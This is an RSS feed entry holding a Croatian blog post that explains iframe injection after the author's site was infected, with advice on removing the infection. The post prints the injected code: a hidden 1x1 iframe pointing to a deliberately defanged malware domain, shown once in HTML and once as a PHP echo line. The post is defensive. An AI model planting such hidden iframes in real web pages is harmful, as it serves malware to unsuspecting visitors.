<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>svebee &#187; iframe</title>
	<atom:link href="http://www.svebee.com/tag/iframe/feed" rel="self" type="application/rss+xml" />
	<link>http://www.svebee.com</link>
	<description>Something about everything...</description>
	<lastBuildDate>Sun, 20 Mar 2011 09:44:29 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.1</generator>
		<item>
		<title>IFrame injection</title>
		<link>http://www.svebee.com/824/iframe-injection</link>
		<comments>http://www.svebee.com/824/iframe-injection#comments</comments>
		<pubDate>Fri, 14 Aug 2009 13:41:19 +0000</pubDate>
		<dc:creator>svebee</dc:creator>
				<category><![CDATA[Internet]]></category>
		<category><![CDATA[frame]]></category>
		<category><![CDATA[hidden iframe]]></category>
		<category><![CDATA[iframe]]></category>
		<category><![CDATA[iframe injection]]></category>
		<category><![CDATA[iframe napad]]></category>
		<category><![CDATA[injection]]></category>

		<guid isPermaLink="false">http://www.svebee.com/?p=824</guid>
		<description><![CDATA[IFrame je skraćenica od inline-frame. Radi se o HTML elementu. Prvenstveno služi za jednostavno ubacivanje jedne (HTML) stranice u drugu, ili pak određenih objekata. Vrlo koristan element, te ima širok spektar mogućnosti. No, kao i kod većine stvari, uloga mu može biti dobra ili loša. IFrame napadi se služe iframe elementom za ubacivanje u pojedine [...]]]></description>
			<content:encoded><![CDATA[<p><strong>IFrame </strong>je skraćenica od <em>inline-frame</em>. Radi se o HTML elementu. Prvenstveno služi za jednostavno ubacivanje jedne (HTML) stranice u drugu, ili pak određenih objekata. Vrlo koristan element, te ima širok spektar mogućnosti. No, kao i kod većine stvari, uloga mu može biti dobra ili loša. IFrame napadi se služe <em>iframe </em>elementom za ubacivanje u pojedine stranice. Takvi napadi pogađaju sve <strong>index.*</strong> <em>(* &#8211; bilo koja ekstenzija)</em> stranice na serveru &#8211; index.<strong>html</strong>, index<strong>.php</strong>, index.<strong>xhtml </strong>i tako redom. Iako moram primijetiti, da su kod jučerašnjeg napada <em>(zbog kojih je stranica bila nedostupna)</em> i par ostalih stranica s imenom <strong>&#8220;default&#8221;</strong> umjesto &#8220;index&#8221; bile zaražene malicioznim kodom. Kao što sam napisao, pogađa sve ekstenzije te im se prilagođava.<span id="more-824"></span></p>
<p>Tako npr. za <strong>.html </strong>stranice ubacuje kod tipa</p>

<div class="wp_syntax"><div class="code"><pre class="html" style="font-family:monospace;">&lt;iframe src=”http://goooogleadsence_ne_klikaj.biz/?click=8F9DA” width=1 height=1 style=”visibility:hidden;position:absolute”&gt;&lt;/iframe&gt;</pre></div></div>

<p>dok za <strong>.php </strong>stranice ubacuje</p>

<div class="wp_syntax"><div class="code"><pre class="php" style="font-family:monospace;"><span style="color: #b1b100;">echo</span> “<span style="color: #339933;">&lt;</span>iframe src<span style="color: #339933;">=</span>\”http<span style="color: #339933;">:</span><span style="color: #666666; font-style: italic;">//goooogleadsence_ne_klikaj.biz/?click=8F9DA\” width=1 height=1 style=\”visibility:hidden;position:absolute\”&gt;&lt;/iframe&gt;”;</span></pre></div></div>

<p><em><strong>NAPOMENA:</strong> URL (link) je editiran, dodano je <strong>ne_klikaj</strong> iz razloga da (po)neki korisnici nebi otišli na navedene linkove i zarazili se malicioznim kodom.</em></p>
<p>Na koji način može dospijeti na vaše stranice? Postoje dva načina &#8211; preko zaraženog <strong>servera </strong>ili češće, preko korisničkog <strong>FTP klijenta</strong> (računala). U prvom slučaju server ima određene sigurnosne rupe te ukoliko se nađe zaražen, sve stranice na njemu bivaju zaražene (problematičnija stvar). U drugom slučaju, <em>webmasterovo/administratorsko</em> računalo je zaraženo &#8211; tada je pogođena samo njegova stranica tj. stranice kojima ima pristup preko FTP protokola. Kada utipkate korisničko ime <em>(username)</em> i lozinku <em>(password) </em>kako bi pristupili svojoj stranici, crv to pokupi te se bez vašeg znanja spoji na server i ubacuje <strong>što, kako i gdje želi</strong>. To naravno nitko ne želi, stoga <strong>backup </strong>glavu čuva. Osobno, moja stranica je dva puta bila zaražena iframemo, prvi put je samo dodala svoj dio koda na kraj svake index datoteke, no sada je to učinila i na ponekim default datotekama te izbrisala zadnji dio svake datoteke. Ukoliko se nađete u prvoj situaciji, backup i nije nužan, moći ćete ručno sve (p)obirisati, no ukoliko se radi o drugom slučaju morat ćete potražiti eventualno backup hosting tvrtke koja drži server, ili nekako sami to (po)krpati što nikako neće biti jednostavno.</p>
<p>Kada shvatite da su vam stranice zaražene <strong>iframeom</strong>, prvo proskenirajte računalo s nekim od <strong>antivirusnih </strong>programa (preporučam besplatan <strong><a href="http://www.avast.com/">Avast!</a></strong>) te uklonite izvor crva. Nakon toga promijenite FTP šifru s kojom ste pristupali stranici. Obavijestite hosting o napadu kako se isti nebi proširio na ostale stranice. Promijenite dozvole <em>(permissions)</em>, postavite na <em>maximal security</em>. Nakon toga <strong>skinite sve index.*</strong> datoteke te ih čistite jednu po jednu, <strong>ručno </strong>- jer drugog načina nema (tj. ima, pomoću određenih skripti, no tada izlažete stranicu mogućim problemima, da skripta izbriše nešto što ne bi trebala). Ukoliko imate stvarno veliku količinu <em>index.*</em> datoteka, postoji <strong><a href="http://www.diovo.com/wp-content/uploads/2009/04/clean.php.txt">PHP skripta</a></strong> autora <strong><a href="http://www.diovo.com">Niyaz PK</a></strong> koju možete uplodatati u <strong>root </strong>direktorij stranice (naravno prije toga promijenite ekstenziju u <strong>.php</strong>) te joj pristupite sa</p>

<div class="wp_syntax"><div class="code"><pre class="php" style="font-family:monospace;">http<span style="color: #339933;">:</span><span style="color: #666666; font-style: italic;">//www.vasadomena.com/clean.php?s=index.php&amp;c=iframe</span></pre></div></div>

<p>Slovo <strong>s</strong> označuje <strong>s</strong>earch (traži) tj. koje datoteke treba pretražiti, a <strong>c</strong> označuje tekst koji treba pretražiti (u našem slučaju iframe). Izlistat će vam popis svih<em> index.*</em> stranica sa zadanim uvjetima. Skripta <strong>neće </strong>automatski <strong>(o)čistiti </strong>datoteke, to morate napraviti sami &#8211; ručno.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.svebee.com/824/iframe-injection/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

